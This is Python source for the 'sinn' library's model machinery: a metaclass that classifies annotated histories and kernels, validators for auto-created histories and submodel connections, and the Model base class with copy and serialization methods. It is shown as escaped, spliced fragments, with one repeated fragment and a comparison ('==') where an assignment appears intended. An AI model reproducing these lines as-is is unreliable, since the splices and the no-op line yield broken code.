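The annotation loop above is the heart of the metaclass: it classifies annotated attributes by their type at class-creation time. A standalone toy reproduction of that pattern (the `Hist`/`Kern` types are stand-ins, not sinn's):

class Hist: pass
class Kern: pass

class ScanMeta(type):
    def __new__(metacls, name, bases, namespace):
        hists, kernels = [], []
        for nm, T in namespace.get('__annotations__', {}).items():
            if isinstance(T, type) and issubclass(T, Hist):
                hists.append(nm)
            elif isinstance(T, type) and issubclass(T, Kern):
                kernels.append(nm)
        namespace['_hist_identifiers'] = hists
        namespace['_kernel_identifiers'] = kernels
        return super().__new__(metacls, name, bases, namespace)

class Toy(metaclass=ScanMeta):
    u: Hist
    k: Kern

assert Toy._hist_identifiers == ['u'] and Toy._kernel_identifiers == ['k']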
\"defined in the model.\")\n if T is not Any:\n raise TypeError(\n \"At the moment, all attributes of the `State` class \"\n \"should have type `Any`. In the future we may add \"\n \"the possibility to be more specific.\")\n # NOTE: If checking the type histT, remember that it may be\n # something else than a History (e.g. RNG).\n # elif T is not histT:\n # raise TypeError(\n # f\"Model {cls}: `State` defines '{nm}' with type '{T}', \"\n # f\"while the model defines it with type '{histT}'.\")\n\n # Get Parameters and Config: iterate through MRO and stop on 1st hit\n Parameters = namespace.get('Parameters', None) # First check namespace\n Config = namespace.get('Config', None)\n if Config is None:\n Config = type(\"Config\", (), {'keep_untouched': ()})\n for C in mro:\n if Parameters is not None: # and Config is not None:\n break # We've found the Parameters classes; no need to look further\n if Parameters is None:\n Parameters = getattr(C, 'Parameters', None)\n # if Config is None:\n # Config = getattr(C, 'Config', None)\n\n # Sanity check Parameters subclass\n # Parameters = namespace.get('Parameters', None)\n if not isinstance(Parameters, type):\n raise TypeError(f\"Model {cls}: `Parameters` must be a class.\")\n # if (not isinstance(Parameters, type)\n # or not issubclass(Parameters, BaseModel)):\n # raise TypeError(\n # f\"Model {cls}: `Parameters` must inherit from pydantic.\"\n # f\"BaseModel. `{cls}.Parameters.mro()`: {Parameters.mro()}.\")\n\n # Ensure `Parameters` inherits from ModelParams\n # FIXME: When doing this, ensure Parameters.__module__ is the same as\n # originally (and not 'abc')\n if not issubclass(Parameters, ModelParams):\n # We can't have multiple inheritance if the parents don't have the\n # same metaclass. Standard solution: Create a new metaclass, which\n # inherits from the other two, and use *that* as a metaclass.\n paramsmeta = type(ModelParams)\n if paramsmeta is not type(Parameters):\n paramsmeta = type(\"ParametersMeta_Subclass\",\n (paramsmeta, type(Parameters)),\n {})\n OldParameters = Parameters\n if (not issubclass(Parameters, BaseModel)\n and hasattr(Parameters, '__annotations__')):\n # If `Parameters` is not even a subclass of BaseModel, we have\n # to move its annotations to the derived class\n params_namespace = {'__annotations__': Parameters.__annotations__}\n # Also move any defined fields or default values\n # We also need to catch validators, etc.\n # FIXME: I haven't figured out a way to move validators. They\n # need to be of type 'classmethod' when pydantic sees\n # them, they only remain such during the creation of\n # the class. 
Afterwards, they are just 'methods'.\n # So, current approach is, if there are any non-dunder\n # attributes, we raise an error.\n if [attr for attr in dir(Parameters) if attr[:2] != '__']:\n raise TypeError(\"A model's `Parameters` must subclass \"\n \"`sinn.models.ModelParams`.\")\n # for attr in dir(Parameters):\n # if attr[:2] != '__':\n # params_namespace[attr] = getattr(Parameters, attr)\n # delattr(Parameters, attr)\n Parameters.__annotations__= {}\n else:\n params_namespace = {}\n Parameters = paramsmeta(\"Parameters\", (OldParameters, ModelParams),\n params_namespace)\n\n if any(\"Union\" in str(field.type_)\n for field in Parameters.__fields__.values()):\n possible_offenders = [field for field in Parameters.__fields__.values()\n if \"Union\" in str(field.type_)]\n # We allow 'Union' types in one case: if all types in the union\n # have the same dtype and ndim.\n offenders = []\n for field in possible_offenders:\n if getattr(field.type_, '__origin__', None) is not Union:\n # Things like List[Union[int, float]] will end up here\n offenders.append(field.name)\n continue\n dtypes = set()\n ndims = set()\n for T in field.type_.__args__:\n if hasattr(T, 'nptype'): # NPValue, Array, Tensor, Shared\n dtype = str(np.dtype(T.nptype))\n elif hasattr(T, 'dtype'): # Theano, PyMC3 types\n dtype = str(np.dtype(T.dtype))\n elif isinstance(T, type) and issubclass(T, np.number): # NumPy types\n dtype = str(np.dtype(T))\n else:\n # Not a NumPy compatible type\n offenders.append(field.name)\n break\n if hasattr(T, 'ndim_'): # NPValue, Array, PyMC_RV\n ndim = T.ndim_\n elif isinstance(getattr(T, 'ndim', None), int): # Theano, PyMC3 types\n ndim = T.ndim\n elif isinstance(T, type) and issubclass(T, np.number): # NumPy types\n ndim = 0\n else:\n # If none of the types specify ndim, that is also fine\n # NB: NPValue & co. set ndim to 'None' when it is unspecified\n ndim = None\n dtypes.add(dtype)\n ndims.add(ndim)\n if len(dtypes) > 1 or len(ndims) > 1:\n offenders.append(field.name)\n if offenders:\n logger.error(f\"Model '{cls}' has a Union type for the following \"\n f\"parameters: {offenders}.\\n\"\n \"This is strongly discouraged: The compilation of \"\n \"Theano models assumes that parameter types are fixed – \"\n \"breaking this assumption can cause nasty linker errors. 
\"\n \"Exception: Unions of types which all have the same \"\n \"dtype and number of dims are permitted.\")\n\n # Sanity check Config subclass, if present\n # Config = namespace.get('Config', None)\n # No warnings for Config: not required\n if not isinstance(Config, type):\n raise TypeError(f\"Model {cls} `Config` must be a class, \"\n f\"not {type(Config)}.\")\n\n # Rename State and Parameters classes for easier debugging/inspection\n # Don't just append the class name, because classes can be nested and\n # that could lead to multiple names\n # It seems prudent to leave __qualname__ untouched\n if getattr(State, '__name__', None) == \"State\":\n State.__name__ = f\"State ({cls})\"\n if getattr(Parameters, '__name__', None) == \"Parameters\":\n Parameters.__name__ == f\"Parameters ({cls})\"\n\n # Add 'params' variable if it isn't present, and place first in\n # the list of variables so that initializers can find it.\n if 'params' in new_annotations:\n ann_params = new_annotations['params']\n if new_annotations['params'] == 'Parameters':\n new_annotations['params'] = Parameters\n elif new_annotations['params'] is not Parameters:\n if isinstance(ann_params, type) and issubclass(Parameters, ann_params):\n new_annotations['params'] = Parameters\n else:\n raise TypeError(f\"Model {cls} defines `params` but it is \"\n f\"not of type `{cls}.Parameters`. \"\n f\"(Instead it is of type `{type(ann_params)}`)\")\n new_annotations = {'params': new_annotations.pop('params'),\n **new_annotations}\n elif issubclass(Parameters, abc.ABC):\n # Most likely no Parameters class was defined, and we retrieved\n # the abstract definition above.\n # => We skip creating the 'params' attribute, since there is no\n # point in requiring it when the model defines no parameters\n if len(_hist_identifiers) > 0:\n # If there are no histories, it makes sense not to specify a State\n # This can happen for models which just combine submodels\n warn(f\"Model '{type(self).__name__}' does not define a `Parameters` \"\n \"class, or its `Parameters` class inherits from `abc.ABC`.\")\n # Create a new type to minimize the risk of clobbering the base Parameters type\n Parameters = type('Parameters', (Parameters,), {})\n else:\n new_annotations = {'params': Parameters, **new_annotations}\n\n # Add update functions to list\n for obj in namespace.values():\n if isinstance(obj, PendingUpdateFunction):\n if obj.hist_nm not in _hist_identifiers:\n raise TypeError(\n f\"Update function {obj.fn} is intended for history \"\n f\"{obj.hist_nm}, but it is not defined in the model.\")\n _pending_update_functions[obj.hist_nm] = obj\n\n # Add derivatives to dict\n for obj in namespace.values():\n # NB: Existence of '_derivative' attribute indicates that function is a derivative\n # Value of '_derivative' attribute indicates of which variable it is the derivative\n # if isinstance(obj, Callable) and hasattr(obj, '_derivative'):\n if isinstance(obj, Callable_) and hasattr(obj, '_derivative'):\n if not set(obj._derivative) <= set(_hist_identifiers):\n raise TypeError(\n f\"Derivative function is intended for histories \"\n f\"{obj._derivative}, but they are not defined in the model.\")\n _derivatives[obj._derivative] = obj\n\n # Add AutoHist validators\n for nm, obj in list(namespace.items()):\n if isinstance(obj, AutoHist):\n T = all_annotations.get(nm, None)\n # Determine a name for the initialization validator which\n # doesn't match something already in `namespace`\n fn_nm = f\"autohist_{nm}\"\n if fn_nm in namespace:\n # I honestly don't know 
if fn_nm in namespace:\n # I honestly don't know why someone would define a model\n # with clashing names, but just in case.\n for i in range(10):\n fn_nm = f\"autohist_{nm}_{i}\"\n if fn_nm not in namespace:\n break\n if fn_nm in namespace:\n raise AssertionError(\"ModelMetaclass.__new__: The function \"\n f\"'{fn_nm}' is already in the namespace.\")\n if T is None:\n raise TypeError(\"`AutoHist` must follow a type annotation.\")\n if T is Series:\n namespace[fn_nm] = validator(\n nm, allow_reuse=True, always=True, pre=True)(\n init_autoseries)\n elif T is Spiketrain:\n namespace[fn_nm] = validator(\n nm, allow_reuse=True, always=True, pre=True)(\n init_autospiketrain)\n else:\n raise TypeError(\"Unrecognized history type; recognized \"\n \"types:\\n Series, Spiketrain\")\n\n # Add connected hists validators\n for submodel_nm in _model_identifiers:\n namespace[f\"_connect_submodel_{submodel_nm}\"] = \\\n connect_submodel_validator(submodel_nm)\n\n # Update namespace\n namespace['Config'] = Config\n namespace['Parameters'] = Parameters\n # It's not essential to have sorted identifiers (`list` would also work)\n # but predictability helps with debugging, and may affect serialization.\n namespace['_kernel_identifiers'] = sorted(_kernel_identifiers)\n namespace['_hist_identifiers'] = sorted(_hist_identifiers)\n namespace['_model_identifiers'] = list(_model_identifiers) # Must not be sorted: order sets precedence\n namespace['_pending_update_functions'] = list(_pending_update_functions.values())\n namespace['_derivatives'] = _derivatives\n namespace['__annotations__'] = new_annotations\n\n newcls = super().__new__(metacls, cls, bases, namespace)\n\n # Replace the developer docstring with a user docstring\n # (kind of a hacky way to specialize the docstring per class)\n if abc.ABC not in bases:\n # If the model class is still abstract, the dev docstring is more appropriate\n newcls.__doc__ = newcls.summarize() + __model_docstring_footer__\n\n return newcls\n\n # TODO: Recognize RNG as input
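# For orientation, a minimal sketch of what this metaclass collects from a\n# model definition (the names `MyModel`, `x`, `upd_x` and `decay` below are\n# hypothetical; `TimeAxis`, `Series` and `updatefunction` are the classes and\n# decorator used throughout this module):\n#\n# >>> class MyModel(Model):\n# ...     time: TimeAxis\n# ...     x: Series                       # -> recorded in _hist_identifiers\n# ...     class Parameters(ModelParams):\n# ...         decay: float                # -> becomes the 'params' annotation\n# ...     @updatefunction('x', inputs=())\n# ...     def upd_x(self, tidx):          # -> recorded in _pending_update_functions\n# ...         return self.x[tidx-1] * self.params.decay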
# Retrieve kernel_identifiers, hist_identifiers and update_functions\n# from an existing class.\n# This class may or may not subclass Model; in the former case there is\n# nothing beyond retrieving the attributes already set. In the latter case,\n# we reproduce how ModelMetaclass would extract them from annotations.\n# TODO: I'm not super happy with these functions; there should be a way to do\n# this with less repeated code\n# TODO: We lose here for mixins some sanity checks done in ModelMetaclass:\n# - That no annotations are duplicated\n# - That all update functions correspond to a hist_identifier\ndef _get_inherited_kernels(cls):\n kernel_identifiers = getattr(cls, '_kernel_identifiers', None)\n if kernel_identifiers is None:\n # cls doesn't inherit from Model – probably a mixin\n kernel_identifiers = set()\n for C in cls.mro()[::-1]:\n C_kernel_identifiers = getattr(C, '_kernel_identifiers', None)\n if C_kernel_identifiers is None:\n for nm, T in getattr(C, '__annotations__', {}).items():\n if isinstance(T, type) and issubclass(T, Kernel):\n kernel_identifiers.add(nm)\n for nm, T in getattr(cls, '__annotations__', {}).items():\n if isinstance(T, type) and issubclass(T, Kernel):\n kernel_identifiers.add(nm)\n return kernel_identifiers\ndef _get_inherited_hists(cls):\n hist_identifiers = getattr(cls, '_hist_identifiers', None)\n if hist_identifiers is None:\n # cls doesn't inherit from Model – probably a mixin\n hist_identifiers = set()\n for C in cls.mro()[::-1]:\n C_hist_identifiers = getattr(C, '_hist_identifiers', None)\n if C_hist_identifiers is None:\n for nm, T in getattr(C, '__annotations__', {}).items():\n if isinstance(T, type) and issubclass(T, History):\n hist_identifiers.add(nm)\n for nm, T in getattr(cls, '__annotations__', {}).items():\n if isinstance(T, type) and issubclass(T, History):\n hist_identifiers.add(nm)\n return hist_identifiers\ndef _get_inherited_updates(cls):\n pending_update_functions = getattr(cls, '_pending_update_functions', None)\n if pending_update_functions is None:\n # cls doesn't inherit from Model – probably a mixin\n pending_update_functions = []\n for obj in cls.__dict__.values():\n if isinstance(obj, PendingUpdateFunction):\n pending_update_functions.append(obj)\n return pending_update_functions\ndef _get_inherited_derivatives(cls):\n derivatives = getattr(cls, '_derivatives', None)\n if derivatives is None:\n # cls doesn't inherit from Model – probably a mixin\n derivatives = {}\n for obj in cls.__dict__.values():\n # NB: Existence of '_derivative' attribute indicates that function is a derivative\n # Value of '_derivative' attribute indicates of which variable it is the derivative\n if isinstance(obj, Callable_) and hasattr(obj, '_derivative'):\n derivatives[obj._derivative] = obj\n return derivatives
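# Illustrative sketch of the mixin path above (`NoisyMixin` is hypothetical;\n# `Series` is a History subclass used throughout this module). A mixin that\n# does not go through ModelMetaclass has no '_hist_identifiers' attribute, so\n# the helper falls back to scanning its annotations:\n#\n# >>> class NoisyMixin:\n# ...     xi: Series\n# >>> _get_inherited_hists(NoisyMixin)\n# {'xi'}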
def init_autoseries(cls, autohist: AutoHist, values) -> Series:\n time = values.get('time', None)\n if time is None: return autohist\n if isinstance(autohist, dict):\n # We end up here when constructing a model from a dict,\n # which happens when we deserialize a model representation\n # `autohist` then is a complete definition for a history, but we\n # still make sure its time axis is consistent with the model's\n hist = Series.parse_obj(autohist)\n # Test compatibility by converting the two endpoints of the model's time axis\n try:\n time.t0idx.convert(hist.time)\n time.tnidx.convert(hist.time)\n except (TypeError, IndexError):\n raise AssertionError(f\"The time array of {hist.name} does not \"\n \"match that of the model.\\n\"\n f\"{hist.name}.time: {hist.time}\\n\"\n f\"Model.time: {time}\")\n return hist\n return Series(time=time, **autohist.kwargs)\n\ndef init_autospiketrain(cls, autohist: AutoHist, values) -> Spiketrain:\n time = values.get('time', None)\n if time is None: return autohist\n if isinstance(autohist, dict):\n # See comment in init_autoseries\n hist = Spiketrain.parse_obj(autohist)\n try:\n time.t0idx.convert(hist.time)\n time.tnidx.convert(hist.time)\n except (TypeError, IndexError):\n raise AssertionError(f\"The time array of {hist.name} does not \"\n \"match that of the model.\\n\"\n f\"{hist.name}.time: {hist.time}\\n\"\n f\"Model.time: {time}\")\n return hist\n else:\n return Spiketrain(time=time, **autohist.kwargs)\n\ndef connect_submodel_validator(submodel_name):\n \"\"\"\n One of these validators is added for each submodel in a composite model.\n When a history is part of multiple submodels, it is only serialized once.\n This validator adds histories back into the dictionaries for submodels\n where they are missing.\n\n Demonstrative usage::\n\n >>> class A(Model):\n ...     ha: History\n >>> class B(Model):\n ...     hb: History\n >>> class C(Model):\n ...     a: A\n ...     b: B\n ...     _connect_submodel_a = connect_submodel_validator('a')\n ...     _connect_submodel_b = connect_submodel_validator('b')\n\n Actual usage: The Model metaclass adds these validators automatically,\n so users do not need to do so in their models.\n \"\"\"\n def f(submodel, values):\n if not isinstance(submodel, dict):\n # This function only makes sense if `submodel` is not yet instantiated\n # but instead is a dict of attribute values\n # TODO: For instantiated models, we should still check that histories\n # are correctly connected\n return submodel\n conns = values.get('connections')\n if conns:\n for lowerobj, upperobj in conns.items():\n if upperobj.count('.') > 1:\n raise NotImplementedError(\n \"This function _might_ work when `upperobj` references \"\n \"more deeply nested models, but it should be tested first.\")\n uppermodel, histname = upperobj.rsplit('.', 1)\n if uppermodel != submodel_name:\n continue\n if histname in submodel:\n raise ValueError(f\"Cannot connect history '{lowerobj}' to \"\n f\"'{upperobj}': '{upperobj}' is already \"\n \"defined.\")\n # Recursively retrieve the lowerobj. Objects at different levels\n # may be both dicts and Models, so we need to support both `get`\n # and `getattr`. (For the same reason, relying on ParameterSet\n # to do this won't work, since it won't recurse into objects.)\n o = values\n for attr in lowerobj.split('.'):\n try:\n o = getattr(o, attr)\n except AttributeError:\n o = o[attr]\n # Connect the lower history to the upper one\n submodel[histname] = o\n return submodel\n f.__name__ = f\"connect_submodel_{submodel_name.replace('.', '_')}\"\n return validator(submodel_name, pre=True, allow_reuse=True)(f)\n\n_concrete_parameter_classes = {}
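# Sketch of the AutoHist mechanism handled by `init_autoseries` above\n# (hypothetical model; the exact keyword arguments are assumptions, since\n# whatever `AutoHist(...)` receives is simply forwarded to\n# `Series(time=..., **kwargs)`):\n#\n# >>> class MyModel(Model):\n# ...     time: TimeAxis\n# ...     x: Series = AutoHist(name='x', shape=(2,))\n#\n# During validation, the AutoHist placeholder is replaced by\n# `Series(time=<model time>, name='x', shape=(2,))`, so the history\n# automatically shares the model's time axis.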
class Model(pydantic.BaseModel, abc.ABC, metaclass=ModelMetaclass):\n \"\"\"Abstract model class.\n\n A model implementation should derive from this class.\n\n Models **must**:\n\n - Inherit from `~sinn.models.Model`\n - Define a ``time`` attribute, of type `~sinn.histories.TimeAxis`.\n - Define a `Parameters` class within their namespace, which inherits\n from `~pydantic.BaseModel`. This class should define all (and only) model\n parameters as annotations, using the syntax provided by `pydantic`.\n - Define an :meth:`initialize(self, initializer=None)` method. This method\n is intended to be called to reset the model (e.g. after a run / fit).\n It is also called during initialization to set up the model, unless the\n special value ``initializer='do not initialize'`` is passed.\n Its second argument must be ``initializer``; it must be optional, and\n its default value must be ``None``.\n\n In practice, they will also:\n\n - Define histories and kernels as annotations to the model.\n - Define any number of validation/initialization methods, using either the\n `@pydantic.validators` or `@sinn.models.initializer` decorators.\n - Define update functions for the histories using the `@sinn.models.updatefunction`\n decorator.\n\n A typical class definition should look like::\n\n from sinn.histories import TimeAxis, Series\n from sinn.models import Model\n from pydantic import BaseModel\n\n class MyModel(Model):\n time: TimeAxis\n class Parameters(BaseModel):\n ...\n x: Series\n\n @initializer('x')\n def init_x(cls, x, time):\n return Series(time=time, ...)\n\n @updatefunction('x', inputs=())\n def upd_x(self, tidx):\n return ...\n\n .. Hint::\n If you are subclassing Model to create another abstract class (a class\n meant to be subclassed rather than used on its own), add `abc.ABC` to\n its parents – this will identify your model as abstract, and disable\n warnings about missing attributes like `State`. Be sure to use `ABC` as\n the last parent::\n\n from sinn.models import Model\n class MyModel(Model, abc.ABC):\n ...\n\n .. Warning::\n If you need to set the model to a predictable state, use the provided\n `~Model.reseed_rngs` method. Simply setting the state of `self.rng`\n will work for NumPy RNGs, but not symbolic ones.\n \"\"\"\n # TODO: Use the new PrivateAttr instead of __slots__\n __slots__ = ('graph_cache', 'compile_cache', '_pymc', #'batch_start_var', 'batch_size_var',\n '_num_tidx', '_curtidx_var', '_stoptidx_var', '_batchsize_var')\n # '_advance_updates', '_compiled_advance_fns')\n # NB: Use `default_factory` so that each instance gets its own dict\n _num_tidx_objs: dict=PrivateAttr(default_factory=dict)\n # _num_tidx objects are shared variables which can be used in\n # computational graphs. This caching attribute ensures the same object\n # is always returned, so that it can be properly substituted in the\n # computational graph. Since the variable depends on which state
Since the variable depends on which state\n # histories are unlocked, a different object is returned for different\n # unlocked history combinations (hence the need for a dict)\n _advance_updates : dict=PrivateAttr({})\n _compiled_advance_fns: dict=PrivateAttr({})\n _rng_updates : defaultdict=PrivateAttr(\n defaultdict(lambda: defaultdict(lambda: [])))\n # Store RNG updates generated in `get_advance_updates`, so that\n # `reseed_RNGs` knows which RNG need to be seeded.\n # Structure: _rng_updates[cache_key][rng] = [upd1, upd2, ...]\n _derivatives_view: Optional[DerivativesView]=PrivateAttr(None)\n _numeric: Optional[Model]=PrivateAttr(None)\n # Used by `numeric` property to store a reference to the non-symbolic version\n # of the model, ensuring that the same instance is reused if called again.\n connections: Optional[Dict[str,str]]\n # Used to connect histories between submodels; mostly used for deserialization\n # Defines connection pairs for histories in different submodels\n # Order: {lower model.hist name : upper model.hist name},\n # where the \"lower\" model is the one which can be instantiated first\n # IMPORTANT: It is not required to set this variable in order to connect\n # histories; simply reusing the same history instance will do.\n # Once a model is constructed, its `connections` attribute\n # is updated to reflect actual history connections.\n\n class Config:\n # Allow assigning other attributes during initialization.\n extra = 'allow'\n keep_untouched = (ModelParams, PendingUpdateFunction, class_or_instance_method)\n json_encoders = {**mtb.typing.json_encoders,\n **History.Config.json_encoders}\n\n class Parameters(abc.ABC, ModelParams):\n \"\"\"\n Models must define a `Parameters` class within their namespace.\n Don't inherit from this class; i.e. do::\n\n class MyModel(Model):\n class Parameters(BaseModel):\n ...\n \"\"\"\n pass\n\n # =================================================\n # Construction, initialization, copying, validation\n # =================================================\n\n # Register subclasses so they can be deserialized\n def __init_subclass__(cls):\n if not inspect.isabstract(cls) and '__throwaway_class' not in cls.__dict__:\n mtb.iotools.register_datatype(cls)\n\n def __new__(cls, ModelClass=None, **kwargs):\n \"\"\"\n Allow instantiating a more specialized Model from the base class.\n If `ModelClass` is passed (usually a string from the serialized model),\n the corresponding model type is loaded from those registered with\n mtb.iotools. Class construction is then diverted to that subclass.\n `ModelClass` also serves as a flag, to indicate that we are\n reconstructing a model (either from memory or disk), and so that it\n should not be initialized.\n \"\"\"\n if ModelClass is not None:\n if isinstance(ModelClass, str):\n try:\n # TODO: Fix API so we don't need to use private _load_types\n ModelClass = mtb.iotools._load_types[ModelClass]\n except KeyError as e:\n raise ValueError(f\"Unrecognized model type '{ModelClass}'.\"\n ) from e\n if not (isinstance(ModelClass, type) and issubclass(ModelClass, cls)):\n raise AssertionError(f\"Model.__new__: {ModelClass} is not a subclass of {cls}.\")\n if 'initializer' not in kwargs:\n kwargs['initializer'] = 'do not initialize'\n # IMPORTANT: __init__ will still be called with original sig,\n # so setting 'initializer' needs to be done there too.\n # If there are more sig. changes, we may want to call __init__\n # here ourselves, and e.g. 
def __init__(self, initializer=None, ModelClass=None, **kwargs):\n # Recognize if being deserialized, as we do in __new__\n if ModelClass is not None and initializer is None:\n initializer = 'do not initialize'\n # Any update function specification passed as argument needs to be\n # extracted and passed to _base_initialize, because update functions\n # can't be created until the model (namespace) exists\n update_functions = {}\n replace_in_dict = {}\n kwargs = copy.copy(kwargs)\n # NB: We specifically don't recurse into kwargs for submodels:\n # the update_function specs for submodels need to remain in kwargs\n # until they reach their submodel, so that it can attach it correctly\n for attr, v in kwargs.items():\n # Deals with the case where we initialize from a .dict() export\n if isinstance(v, dict) and 'update_function' in v:\n update_functions[f\"{attr}.update_function\"] = v['update_function']\n update_functions[f\"{attr}.range_update_function\"] = v.get('range_update_function', None)\n replace_in_dict[attr] = copy.copy(v)\n replace_in_dict[attr]['update_function'] = None\n replace_in_dict[attr]['range_update_function'] = None\n # TEMP WORKAROUND – for tasks created before we excluded 'Parameters' in dict()\n kwargs.pop(\"Parameters\", None)\n # We do it this way to avoid mutating the kwargs\n for attr, v in replace_in_dict.items():\n kwargs[attr] = v\n # Initialize attributes with Pydantic\n super().__init__(**kwargs)\n # Attach update functions to histories, and set up __slots__\n self._base_initialize(update_functions=update_functions)\n # Run the model initializer\n if not isinstance(initializer, str) or initializer != 'do not initialize':\n self.initialize(initializer)\n\n def copy(self, *args, deep=False, **kwargs):\n if deep:\n if args or kwargs:\n raise NotImplementedError(\"Arguments to Pydantic's `copy` are \"\n \"not supported by Model's deep copy.\")\n return self.copy_with_resize()\n else:\n m = super().copy(*args, deep=deep, **kwargs)\n m._base_initialize(shallow_copy=not deep)\n # m.initialize()\n return m
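 # Usage sketch for the copy variants (`model` is a hypothetical instance;\n # `copy_with_resize` is defined just below):\n #\n # >>> m2 = model.copy()                   # shallow copy: histories are shared\n # >>> m3 = model.copy(deep=True)          # delegates to copy_with_resize()\n # >>> m4 = model.copy_with_resize(T=10.)  # deep copy, time axes resized to\n # #                                         length T (units of the time axis)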
def copy_with_resize(self, T: Optional[Union[float,PintValue]]=None,\n _desc: Optional[dict]=None) -> Model:\n \"\"\"\n Return a copy of `self` for which time axes have been resized to\n have length `T`.\n If `T` is `None`, this is equivalent to a deep copy.\n \"\"\"\n if _desc is None:\n _desc = ParameterSet(self.dict())\n # Recurse into submodels\n for subnm, submodel in self.nested_models.items():\n _desc[subnm] = submodel.copy_with_resize(T, _desc[subnm])\n for low_hist, high_hist in _desc['connections'].get(subnm, {}).items():\n _desc[high_hist] = getattr(_desc[subnm], low_hist)\n del _desc['connections'] # No longer needed, and not in format expected by initializer\n # Set history length to T\n if T is not None:\n time = self.time\n tmax = (mtb.units.ensure_units(time.unit, time.t0)\n + mtb.units.ensure_units(time.unit, T))\n _desc['time'] = self.time.resize(max=tmax)\n for hnm, h in self.nonnested_histories.items():\n try:\n hdesc = _desc[hnm]\n except KeyError:\n continue\n else:\n if isinstance(hdesc, History):\n # We end up here with connected hists, since their desc has\n # already been replaced by a History in the lower model\n assert abs(hdesc.time.max - tmax.magnitude) <= hdesc.time.dt, \\\n f\"Error copying model: time axis for history {hdesc.name} was not set properly.\"\n continue\n # Set time axis to length T\n hdesc['time'] = h.time.resize(max=tmax)\n # Truncate data if it exceeds time axis\n hdesc['data'] = hdesc['data'].copy()[:hdesc['time'].padded_length]\n # Model initializer requires already instantiated parameter sets\n _desc['params'] = self.Parameters(**_desc['params'])\n # Instantiate the model\n return self.__class__(**_desc)\n\n # TODO: Return views (first requires History.numeric to return DataView)\n # TODO: When doing this, also search for comments \"TODO:Numeric\"\n @property\n def numeric(self):\n \"\"\"\n Copy the model, setting each history to be numeric (i.e. non-symbolic).\n\n .. Caution:: At present, converting from a symbolic to a numeric model\n will copy histories, and therefore integration functions will no\n longer work.\n The plan is eventually for `numeric` to return a view, which would\n make it very cheap and also preserve integration.\n \"\"\"\n if not self._numeric:\n update = {hnm: h.numeric for hnm, h in self.nonnested_histories.items()}\n for subnm, submodel in self.nested_models.items():\n update[subnm] = submodel.numeric\n self._numeric = self.copy(update=update)\n return self._numeric\n\n def dict(self, *args, exclude=None, **kwargs):\n # Remove pending update functions from the dict – they are only used\n # to pass information from the metaclass __new__ to the class __init__,\n # and at this point already attached to the histories. Moreover, they\n # are already included in the serialization of HistoryUpdateFunctions\n exclude = add_exclude_mask(\n exclude,\n {attr for attr, value in self.__dict__.items()\n if isinstance(value, PendingUpdateFunction)}\n )\n # To deal with submodels which are initially unknown, we may assign a\n # new concrete Parameters class to self.Parameters (see `SubmodelParams`\n # and `update_parameters_type()`). This class is recreated during\n # deserialization (as long as a 'Parameters' argument is not present),\n # so we exclude it from export\n exclude = add_exclude_mask(exclude, {\"Parameters\"})\n # When serialized, HistoryUpdateFunctions include the namespace.\n # Remove this, since it is the same as `self`, and inserts a circular\n # dependence.\n hists = {attr: hist for attr,hist in self.__dict__.items()\n if isinstance(hist, History)}\n # TODO: Any way to assert the integrity of the namespace ? We would like\n # to execute the assertion below, but during a shallow copy, a\n # 2nd model is created with the same histories; since `namespace`\n # can't point to both, the assertion fails.\n # assert all(h.update_function.namespace is self\n # for h in hists.values())\n excl_nmspc = {attr: {'update_function': {'namespace'}}\n for attr in hists}\n # Remove connected objects which are actually part of another submodel\n excl_conn = {conn_obj: ... for conn_obj in self.connections.values()}\n exclude = add_exclude_mask(exclude, {**excl_nmspc, **excl_conn})\n # Proceed with parent's dict method\n obj = super().dict(*args, exclude=exclude, **kwargs)\n # Add the model name\n obj['ModelClass'] = mtb.iotools.find_registered_typename(self)\n\n return obj\n\n @classmethod\n def parse_obj(cls, obj):\n # Add `initializer` keyword arg to skip initialization\n if 'initializer' not in obj:\n obj['initializer'] = 'do not initialize'\n m = super().parse_obj(obj)\n return m
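 # Serialization round-trip sketch using `dict`/`parse_obj` above (`MyModel`\n # and `model` are hypothetical):\n #\n # >>> desc = model.dict()           # includes a 'ModelClass' entry\n # >>> m2 = MyModel.parse_obj(desc)  # skips initialize() by default\n #\n # Because `dict` records 'ModelClass' and `Model.__new__` uses it to divert\n # construction to the registered subclass, `Model(**desc)` reconstructs a\n # `MyModel` as well.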
This must be done after the type of the\n submodel is known (which currently is known only after instantiation,\n since we don't support true generic types for submodels).\n \"\"\"\n global _concrete_parameter_classes\n\n subparams = {submodelname: submodel.Parameters\n for submodelname, submodel in self.nested_models.items()}\n param_type_key = (type(self), tuple(subparams.values()))\n if param_type_key not in _concrete_parameter_classes:\n missing = set(subparams) - set(self.Parameters.__fields__)\n if missing:\n raise RuntimeError(\n \"The following submodels have no matching entry under \"\n f\"in {type(self).__name__}'s Parameters: {missing}.\")\n for subname, truetype in subparams.copy().items():\n basetype = self.Parameters.__fields__[subname].type_\n if not isinstance(basetype, type):\n raise TypeError(f\"{basetype} should be a type.\")\n if basetype is truetype:\n # No need to replace this type\n del subparams[subname]\n elif not issubclass(basetype, SubmodelParams):\n submodel = self.nested_models[subname]\n raise TypeError(\n f\"Attempting to instantiate model {type(self).__name__} \"\n f\"with submodel {subname} of type {type(submodel)}, \"\n f\"but {type(self).__name__}.Parameters.{subname} expects \"\n f\"{basetype}.\")\n if subparams:\n new_name = (\n f\"{self.Parameters.__qualname__}\"\n f\"[{', '.join(T.__qualname__ for T in param_type_key[1])}]\")\n new_param_type = type(new_name, (self.Parameters,),\n {'__annotations__': subparams})\n else:\n # There actually aren't any SubmodelParams to replace\n new_param_type = self.Parameters\n _concrete_parameter_classes[param_type_key] = new_param_type\n else:\n new_param_type = _concrete_parameter_classes[param_type_key]\n self.Parameters = new_param_type\n self.params = new_param_type.parse_obj(self.params)\n\n def set_submodel_params(self):\n \"\"\"\n Keep submodel parameters in sync with the container model.\n This method has no effect if there are no submodels.\n\n This method has the following effect (`submodel.params` is the\n parameter set of the submodel, and `model.subparams` is the\n corresponding subset of parameters of the container model)::\n\n params_values = submodel.Parameters(model.subparams).get_values()\n submodel.params._set_values(param_values)\n model.subparams = submodel.params\n\n The reasoning is as follows:\n\n - We normally set parameter values with `model.params._set_values(value\n dict)`. 
